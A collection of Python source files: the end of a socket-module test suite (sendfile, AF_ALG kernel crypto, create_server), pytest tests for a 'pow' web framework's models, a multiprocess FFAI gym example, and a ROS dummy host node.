self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
        # If the user specified "0" for proto, then
        # internally Windows will have picked the correct value.
        # Python introspection on the socket, however, will still return
        # 0.  For the shared socket, the Python value is recreated
        # from the actual value, so the two may not compare equal.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
        # Return either the send()-based or the sendfile()-based
        # implementation, depending on which mixin class is being run.
return getattr(sock, "_sendfile_use_send")
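    # Note: this class always exercises the plain send() fallback; the
    # SendfileUsingSendfileTest subclass further down overrides
    # meth_from_sock() so that the same tests exercise the zero-copy
    # os.sendfile() path instead.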
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
@unittest.skip("TODO: RUSTPYTHON, fix sendfile")
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
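    # Rough shape of the AF_ALG conversations exercised below (informal
    # summary of the tests in this class): bind() an algorithm socket to a
    # (type, name) pair, optionally configure it with setsockopt() (e.g.
    # ALG_SET_KEY), accept() to obtain an operation socket, send the input
    # data, then recv() the digest / ciphertext / random bytes, e.g.:
    #
    #     with self.create_alg('hash', 'sha256') as algo:
    #         op, _ = algo.accept()
    #         with op:
    #             op.sendall(b"data to hash")
    #             digest = op.recv(512)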
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
    # Although it should work with kernel 3.19 and newer, the test blocks
    # on Ubuntu 15.10 with kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
                self.assertEqual(s.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
pow_tests.py
|
#
# Pow Default Tests
#
#
# runtest script.
# runs test with respect to some paramters
# currently only os
import sys
import pytest
# possible sys.platform results:
# http://stackoverflow.com/questions/446209/possible-values-from-sys-platform
MODELNAME = "pow_test_model"
class TestClass:
@pytest.mark.notonosx
@pytest.mark.run(order=1)
@pytest.mark.minimal
def test_server(self):
""" test if server starts
calls baseurl:port/test/12
must return 12.
This test the server, routing and method dispatching
"""
print(" .. Test if server works" )
from multiprocessing import Process
import employees.server
import requests
import employees.conf.config as cfg
import time
p = Process(target=employees.server.main)
p.start()
testurl=cfg.server_settings["protocol"] + cfg.server_settings["host"] + ":" + str(cfg.server_settings["port"]) + "/test/12"
r = requests.get(testurl)
p.terminate()
assert int(r.text)==12
@pytest.mark.run(order=2)
@pytest.mark.minimal
def test_sql_generate_model(self):
""" test if sql model is generated"""
print(" .. Test generate_model")
import employees.generate_model as gm
import uuid
import os.path
ret = gm.generate_model(MODELNAME, "sql", appname="employees")
# generate model returns true in case of success
assert ret is True
assert os.path.exists(os.path.normpath("../models/sql/" + MODELNAME + ".py"))
@pytest.mark.run(order=3)
@pytest.mark.minimal
def test_sql_model_type(self):
""" based on test_generate_model. Tests if a model can insert values
DB sqlite by default.
"""
print(" .. Test model is correct type")
from employees.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
assert isinstance(m, PowTestModel)
@pytest.mark.run(order=4)
def test_sql_dbsetup(self):
""" test the setup of the alembic environment """
print(" .. Test SQL: db_setup")
import employees.init_sqldb_environment
import os
os.chdir("..")
r = employees.init_sqldb_environment.init_migrations()
assert r == True
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=5)
def test_sql_migration(self):
""" test the setup of the alembic environment
generate a migration
"""
print(" .. Test SQL: generate_migration")
import employees.generate_migration
import os
os.chdir("..")
script = employees.generate_migration.generate_migration(message="pow_test")
assert os.path.exists(os.path.normpath(script.path))
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=6)
def test_sql_dbupdate(self):
""" test the setup of the alembic environment
actually migrate the DB schema up
"""
print(" .. Test SQL: update_db -d up")
import employees.update_db
import os, time
ret = None
os.chdir("..")
time.sleep(1)
try:
ret = employees.update_db.migrate("up")
except Exception as e:
print(e)
ret = True
time.sleep(5)
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=7)
def test_if_sql_model_validation_works(self):
"""
check if validation works
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
assert m.validate() == True
@pytest.mark.run(order=8)
def test_if_sql_model_validation_fails_successfully(self):
"""
check if validation fails if type is wrong
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
m.title="123456789123456789123456789123456789"
assert m.validate() == False
@pytest.mark.run(order=9)
def test_sql_insert_and_find(self):
""" based on test_generate_model.
Tests if a model can insert values in the DB
and can be found by title attribute.
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.sql.pow_test_model import PowTestModel
import os
m = PowTestModel()
m.title = "TestnamePowTestRunner"
m.upsert()
res=m.find(PowTestModel.title=="TestnamePowTestRunner")
assert res.count()==1
m.session.close()
os.chdir(os.path.abspath(os.path.dirname(__file__)))
#
# tinyDB tests
#
@pytest.mark.run(order=10)
@pytest.mark.minimal
def test_tinydb_generate_model(self):
""" test if sql model is generated"""
print(" .. Test tinyDB generate_model")
import employees.generate_model as gm
import uuid
import os.path
ret = gm.generate_model(MODELNAME, "tinydb", appname="employees")
# generate model returns true in case of success
assert ret is True
assert os.path.exists(os.path.normpath("../models/tinydb/" + MODELNAME + ".py"))
@pytest.mark.run(order=11)
@pytest.mark.minimal
def test_if_tinydb_model_validation_works(self):
"""
check if validation works
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
assert m.validate() == True
@pytest.mark.run(order=12)
@pytest.mark.minimal
def test_if_tinydb_model_validation_fails_successfully(self):
"""
check if validation fails if type is wrong
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
m.title="123456789123456789123456789123456789"
assert m.validate() == False
@pytest.mark.run(order=13)
@pytest.mark.minimal
def test_tinydb_model_type(self):
""" based on test_generate_model. Tests if a model can insert values
DB sqlite by default.
"""
print(" .. Test model tinyDB is correct type")
from employees.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
assert isinstance(m, PowTestModel)
@pytest.mark.run(order=14)
def test_tinydb_insert_and_find(self):
""" based on test_generate_model. Tests if a model can insert values
and can be found back.
"""
print(" .. Test tinyDB: model.upsert() and model.find()")
from employees.models.tinydb.pow_test_model import PowTestModel
import os
m = PowTestModel()
m.title = "TestnamePowTestRunner"
m.upsert()
res=m.find(m.Query.title=="TestnamePowTestRunner")
assert res
m.db.close()
os.chdir(os.path.abspath(os.path.dirname(__file__)))
if __name__ == "__main__":
print(55*"-")
print(" running pow Tests on: " + sys.platform)
print(" ... ")
if sys.platform.startswith("darwin"):
# osx
ret = pytest.main(["-k-notonosx", "pow_tests.py"])
else:
ret = pytest.main(["pow_tests.py"])
print(" Failures: " +str(ret))
print(55*"-")
|
multi_gym_example.py
|
#!/usr/bin/env python3
import gym
import numpy as np
import ffai
from multiprocessing import Process, Pipe
def worker(remote, parent_remote, env):
parent_remote.close()
# Get observations space (layer, height, width)
obs_space = env.observation_space
# Get action space
act_space = env.action_space
# Create random state for action selection
seed = env.get_seed()
rnd = np.random.RandomState(seed)
# Play 10 games
steps = 0
# Reset environment
obs = env.reset()
while True:
command = remote.recv()
if command == 'step':
# Sample random action type
action_types = env.available_action_types()
action_type = rnd.choice(action_types)
# Sample random position - if any
available_positions = env.available_positions(action_type)
pos = rnd.choice(available_positions) if len(available_positions) > 0 else None
# Create action object
action = {
'action-type': action_type,
'x': pos.x if pos is not None else None,
'y': pos.y if pos is not None else None
}
# Gym step function
obs, reward, done, info = env.step(action)
steps += 1
# Render - Does not work when running multiple processes
# env.render(feature_layers=False)
if done:
obs = env.reset()
remote.send((obs, reward, done, info))
elif command == 'reset':
# Reset environment
obs = env.reset()
done = False
elif command == 'close':
# Close environment
env.close()
break
if __name__ == "__main__":
renderer = ffai.Renderer()
nenvs = 8
envs = [gym.make("FFAI-1-v3") for _ in range(nenvs)]
for i in range(len(envs)):
envs[i].seed()
remotes, work_remotes = zip(*[Pipe() for _ in range(nenvs)])
ps = [Process(target=worker, args=(work_remote, remote, env))
for (work_remote, remote, env) in zip(work_remotes, remotes, envs)]
for p in ps:
p.daemon = True # If the main process crashes, we should not cause things to hang
p.start()
for remote in work_remotes:
remote.close()
for i in range(1000):
print(i)
for remote in remotes:
remote.send('step')
results = [remote.recv() for remote in remotes]
for j in range(len(results)):
obs, reward, done, info = results[j]
renderer.render(obs, j)
for remote in remotes:
remote.send('close')
for p in ps:
p.join()
|
dummy_host.py
|
#!/usr/bin/python3
import threading
import time
import rospy
import rosnode
import copy
from nics_robot_host.srv import *
class pos_data(object):
def __init__(self,x,y,theta):
self.x = x
self.y = y
self.theta = theta
class DummyHost(object):
def __init__(self, args, env=None):
# get agent number from env
self.agent_num = 1
# init host node
rospy.init_node("robot_host")
# TODO get this param from launch file
self.core_fps = 10
# check the number of agent client
All_ready = False
while not All_ready:
node_name_list:list[str] = rosnode.get_node_names()
self.car_id_list = []
for node_name in node_name_list:
if node_name.endswith('robot_client'):
                    # assume all robot_client nodes are named '/XXXX/car_id/robot_client'
self.car_id_list.append(node_name.split('/')[-2])
if len(self.car_id_list) == self.agent_num:
All_ready = True
break
print(self.car_id_list)
time.sleep(0.5)
#build observation services
self.obs_server_list = []
for car_id in self.car_id_list:
            # default argument binds the current car_id; a bare closure would capture only the last one
            handle = lambda req, car_id=car_id: self.obs_calculate(car_id, req)
obs_messenger = rospy.Service('/'+car_id+'/get_obs', obs, handle)
self.env = None
self.vrpn_list = [pos_data(0,0,0) for _ in range(self.agent_num)]
        self.core_thread = threading.Thread(target=self.core_function, daemon=True)
        self.core_thread.start()
        rospy.spin()
def obs_calculate(self,car_id,req):
obs_result = [0.0,0.0,1.0,0.0,0.0,0.5]
rospy.loginfo("Calculate obs for car %s",car_id)
print(obs_result)
return obsResponse(obs_result)
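    # Example client call (a sketch; the generated `obs` service type and the car id
    # 'car_0' are assumptions for illustration):
    #   rospy.wait_for_service('/car_0/get_obs')
    #   get_obs = rospy.ServiceProxy('/car_0/get_obs', obs)
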